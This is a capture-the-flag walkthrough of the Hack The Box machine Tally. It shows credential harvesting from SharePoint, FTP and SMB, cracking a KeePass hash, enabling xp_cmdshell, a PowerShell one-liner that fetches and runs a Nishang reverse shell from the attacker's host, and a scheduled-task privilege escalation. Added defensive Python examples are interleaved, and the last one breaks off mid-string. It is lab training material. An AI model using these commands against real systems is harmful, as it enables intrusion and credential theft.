
This is the 44th blog out of a series of blogs I will be publishing on retired HTB machines in preparation for the OSCP. The full list of OSCP-like machines compiled by TJ_Null can be found here.
Let’s get started!
Reconnaissance
Run the nmapAutomator script to enumerate open ports and services running on those ports.
./nmapAutomator.sh 10.10.10.59 All
- All: Runs all the scans consecutively.
Running all scans on 10.10.10.59

Host is likely running Windows

---------------------Starting Nmap Quick Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 01:57 EST
Nmap scan report for 10.10.10.59
Host is up (0.043s latency).
Not shown: 726 closed ports, 267 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
21/tcp  open  ftp
80/tcp  open  http
81/tcp  open  hosts2-ns
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
808/tcp open  ccproxy-http

Nmap done: 1 IP address (1 host up) scanned in 2.56 seconds

---------------------Starting Nmap Basic Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 01:57 EST
Nmap scan report for 10.10.10.59
Host is up (0.15s latency).

PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
80/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
81/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp open  ccproxy-http?
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2m34s, deviation: 0s, median: 2m33s
| ms-sql-info:
|   10.10.10.59:1433:
|     Version:
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-03-07T07:00:34
|_  start_date: 2020-03-07T06:59:02

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.28 seconds

----------------------Starting Nmap UDP Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 01:59 EST
Warning: 10.10.10.59 giving up on port because retransmission cap hit (1).
Nmap scan report for 10.10.10.59
Host is up (0.19s latency).
All 1000 scanned ports on 10.10.10.59 are closed (704) or open|filtered (296)

Nmap done: 1 IP address (1 host up) scanned in 964.68 seconds

---------------------Starting Nmap Full Scan----------------------

Nmap scan report for 10.10.10.59
Host is up (0.098s latency).
Not shown: 61247 closed ports, 4268 filtered ports
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
81/tcp    open  hosts2-ns
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
5985/tcp  open  wsman
15567/tcp open  unknown
32843/tcp open  unknown
32844/tcp open  unknown
32846/tcp open  unknown
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 179.34 seconds
           Raw packets sent: 88392 (3.889MB) | Rcvd: 76277 (3.051MB)

Making a script scan on extra ports: 1433, 5985, 15567, 32843, 32844, 32846, 47001, 49664, 49665, 49666, 49667, 49668, 49669, 49670

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 02:18 EST
Nmap scan report for 10.10.10.59
Host is up (0.081s latency).

PORT      STATE SERVICE            VERSION
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-03-07T06:59:32
|_Not valid after:  2050-03-07T06:59:32
|_ssl-date: 2020-03-07T07:22:19+00:00; +2m34s from scanner time.
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
15567/tcp open  http               Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|   Negotiate
|_  NTLM
| http-ntlm-info:
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
32843/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
32844/tcp open  ssl/http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after:  9999-01-01T00:00:00
|_ssl-date: 2020-03-07T07:22:19+00:00; +2m34s from scanner time.
| tls-alpn:
|   h2
|_  http/1.1
32846/tcp open  storagecraft-image StorageCraft Image Manager
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc              Microsoft Windows RPC
49665/tcp open  msrpc              Microsoft Windows RPC
49666/tcp open  msrpc              Microsoft Windows RPC
49667/tcp open  msrpc              Microsoft Windows RPC
49668/tcp open  msrpc              Microsoft Windows RPC
49669/tcp open  msrpc              Microsoft Windows RPC
49670/tcp open  msrpc              Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2m34s, deviation: 0s, median: 2m33s
| ms-sql-info:
|   10.10.10.59:1433:
|     Version:
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.91 seconds

---------------------Starting Nmap Vulns Scan---------------------

Running CVE scan on all ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 02:19 EST
/usr/local/bin/nmapAutomator.sh: line 226:  2165 Segmentation fault      $nmapType -sV --script vulners --script-args mincvss=7.0 -p$(echo "${ports}") -oN nmap/CVEs_"$1".nmap "$1"

Running Vuln scan on all ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-07 02:20 EST
Nmap scan report for 10.10.10.59
Host is up (0.040s latency).

PORT      STATE SERVICE            VERSION
21/tcp    open  ftp                Microsoft ftpd
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
80/tcp    open  http               Microsoft IIS httpd 10.0
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-frontpage-login:
|   VULNERABLE:
|   Frontpage extension anonymous login
|     State: VULNERABLE
|       Default installations of older versions of frontpage extensions allow anonymous logins which can lead to server compromise.
|
|     References:
|_      http://insecure.org/sploits/Microsoft.frontpage.insecurities.html
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
81/tcp    open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp   open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
808/tcp   open  ccproxy-http?
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2016 13.00.1601
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_sslv2-drown:
|_tls-ticketbleed: ERROR: Script execution failed (use -d to debug)
| vulners:
|   cpe:/a:microsoft:sql_server:2016:
|     CVE-2020-0618  6.5  https://vulners.com/cve/CVE-2020-0618
|     CVE-2019-1068  6.5  https://vulners.com/cve/CVE-2019-1068
|     CVE-2016-7250  6.5  https://vulners.com/cve/CVE-2016-7250
|     CVE-2016-7249  6.5  https://vulners.com/cve/CVE-2016-7249
|     CVE-2017-8516  5.0  https://vulners.com/cve/CVE-2017-8516
|     CVE-2016-7251  4.3  https://vulners.com/cve/CVE-2016-7251
|_    CVE-2016-7252  4.0  https://vulners.com/cve/CVE-2016-7252
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
15567/tcp open  http               Microsoft IIS httpd 10.0
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|_  /_layouts/images/helpicon.gif: MS Sharepoint
|_http-server-header: Microsoft-IIS/10.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
32843/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
32844/tcp open  ssl/http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_sslv2-drown:
32846/tcp open  storagecraft-image StorageCraft Image Manager
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49664/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49665/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49666/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49667/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49668/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49669/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
49670/tcp open  msrpc              Microsoft Windows RPC
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: No accounts left to try
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: No accounts left to try

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 839.56 seconds
We have 22 ports open.
- Port 21: running Microsoft ftpd
- Ports 80, 81, 5985, 32843, 32844 & 47001: running Microsoft HTTPAPI httpd 2.0
- Port 15567: running Microsoft IIS httpd 10.0
- Ports 139 & 445: running SMB
- Ports 135, 49664, 49665, 49666, 49667, 49668, 49669 & 49670: running Microsoft Windows RPC
- Port 808: running ccproxy-http
- Port 1433: running Microsoft SQL Server 2016
- Port 32846: running StorageCraft Image Manager
Before we move on to enumeration, let’s make some mental notes about the scan results.
- We have a bunch of ports running web servers. We’ll start off with enumerating port 80 and work our way down. I terminated nmapAutomator since it would have taken a very long time to enumerate all those ports.
- Nmap didn’t report anonymous login for FTP, so this is unlikely to be our point of entry, unless we get credentials. Nmap has reported this as a false negative before, so it is always good to manually verify it.
- Same goes for SMB. We’ll need credentials to access the service.
- Port 1433 is running a Microsoft SQL Server. If we can find a system administrator account, we’ll have code execution.
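Turning a normal-format nmap report into the per-service summary above by hand is error-prone on a host with this many ports. The Python below is an added example (not part of the original post or of nmapAutomator): it parses the port lines, groups open ports by version string in the same "Port(s) N: running X" style, and pulls out the two SMB signing findings from the host script results that a defender would want to fix. The input is a constructed excerpt of the scan output above.

```python
import re
from collections import defaultdict

# Constructed excerpt of the nmap normal-format output shown above (a subset of the ports).
SAMPLE_NMAP = """\
PORT      STATE SERVICE           VERSION
21/tcp    open  ftp               Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
81/tcp    open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds      Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp   open  ccproxy-http?
1433/tcp  open  ms-sql-s          Microsoft SQL Server 2016 13.00.1601.00; RTM
15567/tcp open  http              Microsoft IIS httpd 10.0
49664/tcp open  msrpc             Microsoft Windows RPC

Host script results:
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

# One port line: "<port>/<proto>  <state>  <service>  [<version>]"; script lines start with "|".
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_ports(text):
    """Return [(port, proto, state, service, version)] for every port line in the report."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            rows.append((int(port), proto, state, service, (version or "").strip()))
    return rows


def group_open_ports(rows):
    """Group open ports by version string, falling back to the service name when
    nmap could not fingerprint the service (e.g. 'ccproxy-http?')."""
    groups = defaultdict(list)
    for port, _proto, state, service, version in rows:
        if state == "open":
            groups[version or service].append(port)
    return dict(groups)


def summarize(groups):
    """Render the groups in the 'Port(s) N: running X' style used in the post,
    ordered by lowest port number in each group."""
    lines = []
    for version, ports in sorted(groups.items(), key=lambda kv: kv[1][0]):
        label = "Port" if len(ports) == 1 else "Ports"
        lines.append("%s %s: running %s" % (label, ", ".join(map(str, ports)), version))
    return lines


def smb_signing_findings(text):
    """Extract the SMB signing state from the host script results. Both conditions
    below mean the host accepts unsigned SMB sessions, which is a hardening item."""
    findings = []
    if "message_signing: disabled" in text:
        findings.append("SMB1: message signing disabled (host accepts unsigned sessions)")
    if "Message signing enabled but not required" in text:
        findings.append("SMB2: signing supported but not required (enforce via policy)")
    return findings
```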
Enumeration
I always start off with enumerating HTTP.
Port 80 HTTP
Visit the application in the browser.

It’s running SharePoint. Since SharePoint has specific directories, we won’t use the normal word list when we gobuster it. Instead we’ll use a SharePoint-specific one.
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt -u 10.10.10.59
This outputs a ton of results to go through. It is easier to instead do a Google search for the important URLs in SharePoint and try those. One interesting entry is the viewlsts.aspx page, which displays the site content.

We see that there is one document and one site page. Clicking on Documents we find a document titled ftp-details.

Download the document and view it.
FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging in
The document contains an FTP password but no username. Next, click on SitePages. For some reason this directs us to the following incorrect URL.
http://10.10.10.59/_layouts/15/start.aspx#/SitePages/Forms/AllPages.aspx
Simply removing the _layouts/15/start.aspx# portion of the URL allows us to view the site pages.

Click on the Finance Team page.

Now we have both a username and password to log into the FTP server!
Port 21 FTP
Log into FTP.
root@kali:~# ftp 10.10.10.59
Connected to 10.10.10.59.
220 Microsoft FTP Service
Name (10.10.10.59:root): ftp_user
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
View the files in the current directory.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
08-31-17 10:51PM <DIR> From-Custodian
10-01-17 10:37PM <DIR> Intranet
08-28-17 05:56PM <DIR> Logs
09-15-17 08:30PM <DIR> To-Upload
09-17-17 08:27PM <DIR> User
226 Transfer complete.
Navigating through the directories, we find a KeePass database in Tim’s directory.
ftp> pwd
257 "/User/Tim/Files" is current directory.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
09-15-17  07:58PM                   17 bonus.txt
09-15-17  08:24PM       <DIR>          KeePass-2.36
09-15-17  08:22PM                 2222 tim.kdbx
226 Transfer complete
Download the database to our attack machine.
ftp> get tim.kdbx
The KeePass database is password protected. In order to crack the password using John the Ripper (JtR), we’ll have to extract a JtR compatible hash of the password. This can be done as follows.
keepass2john tim.kdbx > hash.txt
Then run JtR on the hash.
john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
We get a hit back informing us that the password is “simplementeyo”.
Now we have all the information we need to open the KeePass database. To do that from the command line, we’ll use the kpcli program.
root@kali:~/Desktop/htb/tally# kpcli --kdb tim.kdbx
Going through the entries, we find two credentials. One of them, Finance/Acc0unting, labelled "Tally ACCT share", will probably give us access to SMB, so we’ll start there.
Port 139 SMB
Let’s log into the ACCT share using the credentials we found.
root@kali:~/Desktop/htb/tally/smb# smbclient //10.10.10.59/ACCT -U Finance
Enter WORKGROUP\Finance's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Sep 18 01:58:18 2017
  ..                                  D        0  Mon Sep 18 01:58:18 2017
  Customers                           D        0  Sun Sep 17 16:28:40 2017
  Fees                                D        0  Mon Aug 28 17:20:52 2017
  Invoices                            D        0  Mon Aug 28 17:18:19 2017
  Jess                                D        0  Sun Sep 17 16:41:29 2017
  Payroll                             D        0  Mon Aug 28 17:13:32 2017
  Reports                             D        0  Fri Sep  1 16:50:11 2017
  Tax                                 D        0  Sun Sep 17 16:45:47 2017
  Transactions                        D        0  Wed Sep 13 15:57:44 2017
  zz_Archived                         D        0  Fri Sep 15 16:29:35 2017
  zz_Migration                        D        0  Sun Sep 17 16:49:13 2017

                8387839 blocks of size 4096. 709452 blocks available
After enumerating all the directories, we find two interesting entries. The first is in the zz_Archived\SQL directory.
smb: \> cd \zz_Archived\SQL
smb: \zz_Archived\SQL\> dir
  .                                   D        0  Fri Sep 15 16:29:36 2017
  ..                                  D        0  Fri Sep 15 16:29:36 2017
  conn-info.txt                       A       77  Sun Sep 17 16:26:56 2017

                8387839 blocks of size 4096. 709178 blocks available
smb: \zz_Archived\SQL\> get conn-info.txt
getting file \zz_Archived\SQL\conn-info.txt of size 77 as conn-info.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
View the content of the file on the attack machine.
old server details
db: sa
pass: YE%TJC%&HYbe5Nw
have changed for tally
We have SQL credentials for an old server.
The other interesting entry we found is in the zz_Migration\Binaries\New folder directory.

The file tester.exe looks like a custom executable file. Download it to your attack machine.
get tester.exe
Use the strings command to print the printable strings embedded in the file.
root@kali:~/Desktop/htb/tally/smb# strings tester.exe
...
WVS3
<$Xf
^_[3
SQLSTATE:
Message:
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
select * from Orchard_Users_UserPartRecord
Unknown exception
bad cast
bad locale name
false
true
generic
iostream
iostream stream error
ios_base::badbit set
...
We get another SQL username and password.
username: sa
password: GWE3V65#6KFH93@4GWTG2G
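This kind of leak is cheap to catch before a binary ships: scan build artifacts for embedded connection strings. The Python below is an added example, not code from the original post; it re-implements the printable-string extraction that strings performs, parses ODBC-style DRIVER=...;UID=...;PWD=... strings, and reports each one with the secret redacted so the finding itself does not spread the password. The sample bytes are constructed to mimic the strings output above.

```python
import re

# ODBC-style connection string: KEY=value pairs separated by ';'.
_CONN_KEY_RE = re.compile(
    r"(?i)\b(DRIVER|SERVER|DATABASE|UID|PWD|PASSWORD|USER ID)\s*=\s*([^;]*)"
)
# Keys whose values are secrets; a string is only a finding if it carries one of these.
SENSITIVE_KEYS = {"PWD", "PASSWORD"}

# Constructed sample: a few header bytes, then NUL-separated strings modelled on the
# `strings tester.exe` output above (the connection string is the one shown there).
SAMPLE_BINARY = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff"
    + b"WVS3\x00<$Xf\x00^_[3\x00SQLSTATE: \x00Message: \x00"
    + b"DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;"
    + b"PWD=GWE3V65#6KFH93@4GWTG2G;\x00"
    + b"select * from Orchard_Users_UserPartRecord\x00Unknown exception\x00bad cast\x00"
)


def extract_strings(data, min_len=4):
    """Yield (offset, text) for every run of >= min_len printable ASCII bytes,
    the same default behaviour as `strings -n 4`."""
    pat = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    for m in pat.finditer(data):
        yield m.start(), m.group().decode("ascii")


def parse_connection_string(s):
    """Return {KEY: value} for an ODBC-style string that contains a credential key,
    or None if the string carries no PWD/PASSWORD field."""
    fields = {k.upper(): v.strip() for k, v in _CONN_KEY_RE.findall(s)}
    if not (fields.keys() & SENSITIVE_KEYS):
        return None
    return fields


def redact(fields):
    """Replace secret values with a length-only marker so reports are safe to share."""
    out = dict(fields)
    for key in SENSITIVE_KEYS & out.keys():
        out[key] = "<redacted:%d chars>" % len(out[key])
    return out


def scan_binary(data):
    """Return a list of redacted findings, one per embedded connection string,
    each tagged with the byte offset at which the string starts."""
    findings = []
    for offset, s in extract_strings(data):
        fields = parse_connection_string(s)
        if fields:
            finding = redact(fields)
            finding["offset"] = offset
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_binary(SAMPLE_BINARY):
        print("hardcoded credential at offset %d: %s" % (f["offset"], f))
```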
Port 1433 SQL
Let’s test out the first credentials we found to log into the database.
sqsh -S 10.10.10.59 -U sa -P "YE%TJC%&HYbe5Nw"
- -S: server
- -U: username
- -P: password
We get a login failed error. Let’s test out the second credentials we found.
sqsh -S 10.10.10.59 -U sa -P "GWE3V65#6KFH93@4GWTG2G"
We’re in!
Since this is a System Administrator (SA) account, we should be able to run system commands.
Test out the whoami command using xp_cmdshell.
1> xp_cmdshell 'whoami';
2> go
Msg 15281, Level 16, State 1
Server 'TALLY', Procedure 'xp_cmdshell', Line 1 SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
We get an error telling us that the xp_cmdshell option is disabled. Since we have an account with the highest level of privilege (SA), we can simply enable it.
1> EXEC sp_configure 'show advanced options', 1;
2> go
Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE
statement to install.
(return status = 0)
1> RECONFIGURE;
2> go
1> EXEC sp_configure 'xp_cmdshell', 1;
2> go
Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to
install.
(return status = 0)
1> RECONFIGURE;
2> go
Try the whoami command again.

Perfect, we finally have code execution!
Initial Foothold
Let’s use that to send a reverse shell to our attack machine.
Download the Nishang repository and copy the Invoke-PowerShellTcp.ps1 script into your current directory.
cp ../../tools/nishang/Shells/Invoke-PowerShellTcp.ps1 .
mv Invoke-PowerShellTcp.ps1 shell.ps1
Add the following line to the end of the script with the attack machine configuration settings.
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.45 -Port 1234
When called, this sends a reverse shell back to our attack machine on port 1234.
Start up a python server in the directory that the shell script resides in.
python -m SimpleHTTPServer 5555
Setup a listener to receive the reverse shell.
nc -nlvp 1234
Then download and execute the powershell script in SQL.
1> xp_cmdshell "powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.45:5555/shell.ps1')"
2> go
We get a shell!

Grab the user.txt flag.
Privilege Escalation
View the content of Sarah’s desktop directory.
PS C:\Users\Sarah\Desktop> dir

    Directory: C:\Users\Sarah\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       01/10/2017     22:32            916 browser.bat
-a----       17/09/2017     21:50            845 FTP.lnk
-a----       23/09/2017     21:11            297 note to tim (draft).txt
-a----       19/10/2017     21:49          17152 SPBestWarmUp.ps1
-a----       19/10/2017     22:48          11010 SPBestWarmUp.xml
-a----       17/09/2017     21:48           1914 SQLCMD.lnk
-a----       21/09/2017     00:46            129 todo.txt
-ar---       31/08/2017     02:04             32 user.txt
-a----       17/09/2017     21:49            936 zz_Migration.lnk
There are two interesting files, SPBestWarmUp.ps1 and SPBestWarmUp.xml. Looking through SPBestWarmUp.xml we see that it runs SPBestWarmUp.ps1 with Administrator privileges every hour (indicated by the field <Interval>PT1H</Interval>). This is probably run as a scheduled task. We can confirm that once we get a reverse shell with administrator privileges.
<CalendarTrigger>
  <Repetition>
    <Interval>PT1H</Interval>
    <Duration>P1D</Duration>
    <StopAtDurationEnd>false</StopAtDurationEnd>
  </Repetition>
  <StartBoundary>2017-01-25T01:00:00</StartBoundary>
  <Enabled>true</Enabled>
  <ScheduleByDay>
    <DaysInterval>1</DaysInterval>
  </ScheduleByDay>
</CalendarTrigger>
....
<Principals>
  <Principal id="Author">
    <UserId>TALLY\Administrator</UserId>
    <LogonType>Password</LogonType>
    <RunLevel>HighestAvailable</RunLevel>
  </Principal>
</Principals>
....
<Actions Context="Author">
  <Exec>
    <Command>PowerShell.exe</Command>
    <Arguments>-ExecutionPolicy Bypass -File SPBestWarmUp.ps1 -skipadmincheck</Arguments>
    <WorkingDirectory>C:\Users\Sarah\Desktop</WorkingDirectory>
  </Exec>
</Actions>
Let’s view the permissions on SPBestWarmUp.ps1.
PS C:\Users\Sarah\Desktop> Get-Acl SPBestWarmUp.ps1 | Format-List

Path   : Microsoft.PowerShell.Core\FileSystem::C:\Users\Sarah\Desktop\SPBestWarmUp.ps1
Owner  : TALLY\Sarah
Group  : TALLY\None
Access : NT AUTHORITY\SYSTEM Allow  FullControl
         BUILTIN\Administrators Allow  FullControl
         TALLY\Sarah Allow  FullControl
Audit  :
Sddl   : O:S-1-5-21-1971769256-327852233-3012798916-1000G:S-1-5-21-1971769256-327852233-3012798916-513D:(A;ID;FA;;;SY)(A;ID;FA;;;BA)(A;ID;FA;;;S-1-5-21-1971769256-327852233-3012798916-1000)
As the user Sarah, we own the file. Therefore, we could simply change the content of the file to include a reverse shell and wait until the hour changes and the scheduled task gets executed with administrator privileges.
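The same misconfiguration can be found on the defending side by auditing exported task definitions (for example the XML that schtasks /query /tn <task> /xml prints) for elevated tasks whose script lives in another user's profile directory, which that user can write to. The Python below is an added example, not from the original post: the task XML is constructed from the fragments shown above inside a root element with the standard Task Scheduler schema namespace, and the rule for what counts as an elevated task is this example's own heuristic.

```python
import ntpath
import re
import xml.etree.ElementTree as ET

# Namespace of the Task Scheduler XML schema (the fragments above omit the root).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed task definition built from the SPBestWarmUp.xml fragments shown above.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <Repetition><Interval>PT1H</Interval><Duration>P1D</Duration></Repetition>
      <StartBoundary>2017-01-25T01:00:00</StartBoundary>
      <Enabled>true</Enabled>
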